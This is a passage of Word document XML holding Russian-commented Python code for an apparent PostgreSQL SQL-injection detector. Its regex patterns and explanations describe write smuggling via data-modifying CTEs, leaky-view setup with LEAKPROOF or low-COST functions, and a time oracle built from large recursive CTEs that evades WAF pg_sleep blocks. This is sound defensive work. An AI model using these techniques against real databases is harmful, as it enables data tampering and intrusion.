          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.10.1 — DML внутри WITH с RETURNING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bWITH\b[\s\S]{0,200}?\bAS\b\s*(?:NOT\s+)?(?:MATERIALIZED\s+)?\(\s*"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:INSERT|UPDATE|DELETE|MERGE)\b[\s\S]{0,500}?\bRETURNING\b",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"cte_recursive_large_n": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.10.2 — recursive CTE c итерацией ≥ 10^6 (calibrated time-oracle)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bWITH\s+RECURSIVE\b[\s\S]{0,300}?\bWHERE\s+\w+\s*&lt;\s*\d{6,}|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.10.2 — generate_series с N ≥ 10^7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bgenerate_series\s*\(\s*\d+\s*,\s*\d{7,}\b",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"cte_leaky_setup": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.10.3 setup — функция с экстремально низкой cost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b[\s\S]{0,500}?\bCOST\s+0\.\d{4,}|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.10.3 setup — функция с LEAKPROOF (требует SUPERUSER)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b[\s\S]{0,500}?\bLEAKPROOF\b",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"cte_not_materialized": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.10.3 explicit anti-protection — атакующий блокирует попытку CTE-материализации</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bWITH\b[\s\S]{0,100}?\bAS\s+NOT\s+MATERIALIZED\b",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if _RE["cte_dml"].search(sql):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vulnerability_class=VulnerabilityClass.CTE_SIDE_EFFECTS,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=9,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Запрос содержит data-modifying CTE (WITH ... AS "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "(INSERT|UPDATE|DELETE|MERGE ... RETURNING)) — паттерн "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "smuggling-а write-операций через SELECT-эндпоинт. "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "Не блокируется extended-protocol stacking-защитой.",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Если эндпоинт логически только читает — заблокируйте "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "WITH ... AS (DML ...) на уровне SQL-validation или "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "перейдите на read-only-роль для соответствующего "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "connection-pool.",</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_RE["cte_leaky_setup"].search(sql):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vulnerability_class=VulnerabilityClass.CTE_SIDE_EFFECTS,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=9,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="CREATE FUNCTION с экстремально низкой COST (&lt;0.001) "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "или с флагом LEAKPROOF — pre-attack setup для leaky-views "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "exploitation. LEAKPROOF требует SUPERUSER.",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Удалите CREATE FUNCTION; cost-overrides и LEAKPROOF "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "должны устанавливаться DBA при установке расширений, "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "не в application-runtime.",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_RE["cte_not_materialized"].search(sql):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vulnerability_class=VulnerabilityClass.CTE_SIDE_EFFECTS,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=7,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="WITH ... AS NOT MATERIALIZED — явный inline-keyword. "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "В application-коде редко легитимен (default-behavior "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "и так inline на PG 12+); explicit NOT MATERIALIZED — "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "часто маркер атаки на leaky-views (3.10.3).",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Уберите NOT MATERIALIZED keyword. Если требуется "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "principled materialization-control — это редкая ad-hoc "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "reporting-задача, не application-runtime.",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_RE["cte_recursive_large_n"].search(sql):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vulnerability_class=VulnerabilityClass.CTE_SIDE_EFFECTS,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=8,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Recursive CTE с N ≥ 10^6 или generate_series с N ≥ 10^7 — "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "паттерн time-based oracle без pg_sleep. Альтернатива из "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "3.10.2 для обхода WAF-блокировок pg_sleep.",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="В application-runtime recursive CTE редко с такими N; "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "проверьте источник параметра — если из user-input, "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "ограничьте на уровне валидации.",</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Градация risk обоснована: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cte_dml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Data-modifying CTE через SELECT-эндпоинт — почти всегда атака. Легитимные DML-CTE в application-runtime редки и хорошо контролируются (fixed SQL templates).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cte_leaky_setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. CREATE FUNCTION с экстремальной COST или LEAKPROOF — post-exploitation setup; в normal application нет use case.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cte_recursive_large_n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
